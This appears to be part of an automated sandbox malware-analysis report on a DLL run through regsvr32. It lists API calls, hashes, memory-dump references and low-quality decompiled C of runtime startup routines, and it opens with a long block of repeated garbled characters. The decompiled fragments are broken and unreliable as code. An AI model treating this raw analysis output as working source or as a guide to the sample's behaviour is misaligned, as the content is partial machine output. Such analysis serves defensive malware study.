9n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$P)t$QvS$R@Uf$S8/$SbRU$Sm7($S}R$Ufvv$YRmr$YTf3$\)9Q$\>}T$\G2e$]LC*$`7aB$`0$a>$c8r6$d?Sh$eLRx$f3A-$f3EV$g3EY$m7(M$m7lM$o4}y$tjJZ$ug3E$wB5q$y4s${O4^${fWE$(5Q$3`)$;n$@WD${HJ${Hr$ i
                                                                                        • API String ID: 969709653-2604367738
                                                                                        • Opcode ID: 1f522f1898d5c03997dd77ec6b46a9deae6259606fadd3d2ed93620fe165c3b2
                                                                                        • Instruction ID: 86ebf3e58850df7caef67e7b2e4f27d1a7c41f57ec218862711b3505b0e3979a
                                                                                        • Opcode Fuzzy Hash: 1f522f1898d5c03997dd77ec6b46a9deae6259606fadd3d2ed93620fe165c3b2
                                                                                        • Instruction Fuzzy Hash: 4D635361E292C24EEFA4EFA2B8513ED2791E746788F445034E90D5FB66DF3CA205CB05
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • _lock.LIBCMT ref: 000007FEF752E041
                                                                                          • Part of subcall function 000007FEF752FD8C: _amsg_exit.LIBCMT ref: 000007FEF752FDB6
                                                                                        • RtlDecodePointer.NTDLL(?,?,?,?,?,?,00000000,000007FEF752E1E9,?,?,00000000,000007FEF752FDBB), ref: 000007FEF752E074
                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,000007FEF752E1E9,?,?,00000000,000007FEF752FDBB), ref: 000007FEF752E092
                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,000007FEF752E1E9,?,?,00000000,000007FEF752FDBB), ref: 000007FEF752E0D2
                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,000007FEF752E1E9,?,?,00000000,000007FEF752FDBB), ref: 000007FEF752E0EC
                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,000007FEF752E1E9,?,?,00000000,000007FEF752FDBB), ref: 000007FEF752E0FC
                                                                                        • ExitProcess.KERNEL32 ref: 000007FEF752E188
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1264950335.000007FEF7521000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000007FEF7520000, based on PE: true
                                                                                        • Associated: 00000005.00000002.1264946903.000007FEF7520000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.1264960138.000007FEF7537000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.1264965991.000007FEF7540000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.1264982139.000007FEF7545000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7fef7520000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: DecodePointer$ExitProcess_amsg_exit_lock
                                                                                        • String ID:
                                                                                        • API String ID: 3411037476-0
                                                                                        • Opcode ID: fa62ff37eb1ee0fdb7c4761492bc8745458489f2aa957d5928a0025dfa04857c
                                                                                        • Instruction ID: dc135f24d880fbeb867de3750d76681b43d5dabfe15a827171e5699f6a1b9e50
                                                                                        • Opcode Fuzzy Hash: fa62ff37eb1ee0fdb7c4761492bc8745458489f2aa957d5928a0025dfa04857c
                                                                                        • Instruction Fuzzy Hash: 5F416731B2AA6281EAD49B51FC8433962E5B788B84F144438BE4E477B5DF3CE495C710
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        C-Code - Quality: 24%
                                                                                        			E000007FE7FEF752DB58(long* __rax, void* __rdx, void* __rdi, void* __rsi) {
                                                                                        				void* __rbx;
                                                                                        				intOrPtr _t5;
                                                                                        				void* _t6;
                                                                                        				long _t8;
                                                                                        				long* _t21;
                                                                                        				void* _t22;
                                                                                        				long* _t23;
                                                                                        				void* _t30;
                                                                                        
                                                                                        				_t29 = __rsi;
                                                                                        				_t28 = __rdi;
                                                                                        				_t21 = __rax;
                                                                                        				E000007FE7FEF752DEB4(__rax, _t22, __rdx); // executed
                                                                                        				_t5 = E000007FE7FEF752FB80(_t22, __rdi, __rsi);
                                                                                        				if (_t5 == 0) goto 0xf752dbcc;
                                                                                        				__imp__FlsAlloc();
                                                                                        				 *0xf7540a30 = _t5;
                                                                                        				if (_t5 == 0xffffffff) goto 0xf752dbcc;
                                                                                        				_t6 = E000007FE7FEF752C464(_t22, 0x7fef752d9e4, __rdx, _t28, _t29, _t30);
                                                                                        				_t23 = _t21;
                                                                                        				if (_t21 == 0) goto 0xf752dbcc;
                                                                                        				__imp__FlsSetValue();
                                                                                        				if (_t6 == 0) goto 0xf752dbcc;
                                                                                        				E000007FE7FEF752D884(_t23, _t23, _t21);
                                                                                        				_t8 = GetCurrentThreadId();
                                                                                        				_t23[2] = _t23[2] | 0xffffffff;
                                                                                        				 *_t23 = _t8;
                                                                                        				goto 0xf752dbd3;
                                                                                        				E000007FE7FEF752D85C(_t23, _t23, _t21);
                                                                                        				return 0;
                                                                                        			}











                                                                                        0x7fef752db58
                                                                                        0x7fef752db58
                                                                                        0x7fef752db58
                                                                                        0x7fef752db5e
                                                                                        0x7fef752db63
                                                                                        0x7fef752db6a
                                                                                        0x7fef752db73
                                                                                        0x7fef752db79
                                                                                        0x7fef752db82
                                                                                        0x7fef752db8e
                                                                                        0x7fef752db93
                                                                                        0x7fef752db99
                                                                                        0x7fef752dba4
                                                                                        0x7fef752dbac
                                                                                        0x7fef752dbb3
                                                                                        0x7fef752dbb8
                                                                                        0x7fef752dbbe
                                                                                        0x7fef752dbc3
                                                                                        0x7fef752dbca
                                                                                        0x7fef752dbcc
                                                                                        0x7fef752dbd8

                                                                                        APIs
                                                                                          • Part of subcall function 000007FEF752DEB4: EncodePointer.KERNEL32 ref: 000007FEF752DE33
                                                                                          • Part of subcall function 000007FEF752DEB4: _initp_misc_winsig.LIBCMT ref: 000007FEF752DEE5
                                                                                          • Part of subcall function 000007FEF752FB80: InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,000007FEF752DB68,?,?,?,000007FEF7528E33), ref: 000007FEF752FBC5
                                                                                        • FlsAlloc.KERNEL32(?,?,?,000007FEF7528E33), ref: 000007FEF752DB73
                                                                                          • Part of subcall function 000007FEF752C464: Sleep.KERNEL32(?,?,?,000007FEF752D96F,?,?,?,000007FEF752F5C9,?,?,?,?,000007FEF752D3C6,?,?,?), ref: 000007FEF752C4A9
                                                                                        • FlsSetValue.KERNEL32(?,?,?,000007FEF7528E33), ref: 000007FEF752DBA4
                                                                                        • GetCurrentThreadId.KERNEL32(?,?,?,000007FEF7528E33), ref: 000007FEF752DBB8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1264950335.000007FEF7521000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000007FEF7520000, based on PE: true
                                                                                        • Associated: 00000005.00000002.1264946903.000007FEF7520000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.1264960138.000007FEF7537000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.1264965991.000007FEF7540000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.1264982139.000007FEF7545000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7fef7520000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _lock$AllocCountCriticalCurrentEncodeInitializePointerSectionSleepSpinThreadValue_initp_misc_winsig
                                                                                        • String ID:
                                                                                        • API String ID: 3311150041-0
                                                                                        • Opcode ID: 563ba2b497b724dfe8105aa0f64df9c03b6129da4ec98886fb8d82d1cc552489
                                                                                        • Instruction ID: cda734197570e759bf880b8d338ccfc6671b07bc194821f5ea92b008f11fced2
                                                                                        • Opcode Fuzzy Hash: 563ba2b497b724dfe8105aa0f64df9c03b6129da4ec98886fb8d82d1cc552489
                                                                                        • Instruction Fuzzy Hash: C1016D22E2870745FBD4ABF5986537822D16B58761F144B34B82D862F2EE3CE885C630
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1836 7fef752ea90-7fef752eab6 HeapCreate 1837 7fef752eae1-7fef752eae5 1836->1837 1838 7fef752eab8-7fef752eac0 GetVersion 1836->1838 1839 7fef752eac2-7fef752ead6 HeapSetInformation 1838->1839 1840 7fef752eadc 1838->1840 1839->1840 1840->1837
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1264950335.000007FEF7521000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000007FEF7520000, based on PE: true
                                                                                        • Associated: 00000005.00000002.1264946903.000007FEF7520000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.1264960138.000007FEF7537000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.1264965991.000007FEF7540000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.1264982139.000007FEF7545000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7fef7520000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$CreateInformationVersion
                                                                                        • String ID:
                                                                                        • API String ID: 3563531100-0
                                                                                        • Opcode ID: 1ea3229dc46f1d4a0352a5312c6b83ff2f083a6c52a9eefe1a8ca3a2de814203
                                                                                        • Instruction ID: 501436df462f7826d0f16fcef7fca37877cf6ca1f4dabfcc1d579669a6ebee2e
                                                                                        • Opcode Fuzzy Hash: 1ea3229dc46f1d4a0352a5312c6b83ff2f083a6c52a9eefe1a8ca3a2de814203
                                                                                        • Instruction Fuzzy Hash: B5E06D74F3966282F7C45B51A899B7922D1F788300F805838FD4E027B4DF3D9086C610
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 61%
                                                                                        			E000007FE7FEF752DEB4(intOrPtr* __rax, void* __rbx, void* __rdx, long long _a8) {
                                                                                        				void* _t3;
                                                                                        				void* _t9;
                                                                                        				long long* _t14;
                                                                                        				long long _t17;
                                                                                        				void* _t28;
                                                                                        
                                                                                        				E000007FE7FEF752D84C(); // executed
                                                                                        				E000007FE7FEF75343E4(E000007FE7FEF7534714(E000007FE7FEF752F24C(E000007FE7FEF752F290(E000007FE7FEF752F254(_t3, __rax), __rax), __rax), __rax), __rax);
                                                                                        				_pop(_t17);
                                                                                        				goto 0xf752de28;
                                                                                        				asm("int3");
                                                                                        				if (__rax - __rdx >= 0) goto 0xf752df2a;
                                                                                        				_a8 = _t17;
                                                                                        				_t14 =  *((intOrPtr*)(__rax));
                                                                                        				if (_t14 == 0) goto 0xf752df17;
                                                                                        				_t9 =  *_t14(_t28);
                                                                                        				if (__rax + 8 - __rdx < 0) goto 0xf752df0d;
                                                                                        				return _t9;
                                                                                        			}








                                                                                        0x7fef752deba
                                                                                        0x7fef752dee5
                                                                                        0x7fef752def1
                                                                                        0x7fef752def2
                                                                                        0x7fef752def7
                                                                                        0x7fef752defb
                                                                                        0x7fef752defd
                                                                                        0x7fef752df0d
                                                                                        0x7fef752df13
                                                                                        0x7fef752df15
                                                                                        0x7fef752df1e
                                                                                        0x7fef752df2a

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1264950335.000007FEF7521000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000007FEF7520000, based on PE: true
                                                                                        • Associated: 00000005.00000002.1264946903.000007FEF7520000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.1264960138.000007FEF7537000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.1264965991.000007FEF7540000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.1264982139.000007FEF7545000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7fef7520000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer_initp_misc_winsig
                                                                                        • String ID:
                                                                                        • API String ID: 2349294043-0
                                                                                        • Opcode ID: 8d3f1213d7f73ebf5a4ab891a74a7c3ec0c025a7e20eb38cdbf6d46c2a5dfc04
                                                                                        • Instruction ID: 3c27a85fbc4e5dfe1eb7b5f10412195c72b579f606c550bb392996322a377648
                                                                                        • Opcode Fuzzy Hash: 8d3f1213d7f73ebf5a4ab891a74a7c3ec0c025a7e20eb38cdbf6d46c2a5dfc04
                                                                                        • Instruction Fuzzy Hash: AFE0C914FA964780EDC8FBA27CA22B812D1579AB40F545430BD0E4A3B29D3CA095C720
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RtlEncodePointer.NTDLL(?,?,?,000007FEF752DF9B,?,?,?,000007FEF7528E85), ref: 000007FEF7534735
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1264950335.000007FEF7521000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000007FEF7520000, based on PE: true
                                                                                        • Associated: 00000005.00000002.1264946903.000007FEF7520000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.1264960138.000007FEF7537000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.1264965991.000007FEF7540000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.1264982139.000007FEF7545000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7fef7520000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer
                                                                                        • String ID:
                                                                                        • API String ID: 2118026453-0
                                                                                        • Opcode ID: 6ec9d99019e729d3521919ca2de1bc9e27273abe180a87a70a7f20145cf695b8
                                                                                        • Instruction ID: 3b6b598e17eda49435c56ffb1f8dd61245293024866dcb34fdd30a2fe4fd9b1e
                                                                                        • Opcode Fuzzy Hash: 6ec9d99019e729d3521919ca2de1bc9e27273abe180a87a70a7f20145cf695b8
                                                                                        • Instruction Fuzzy Hash: ABD01222B64A4192DB818F51F59036863A1F7887D5F588030EA4D06674DE3CC4968701
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%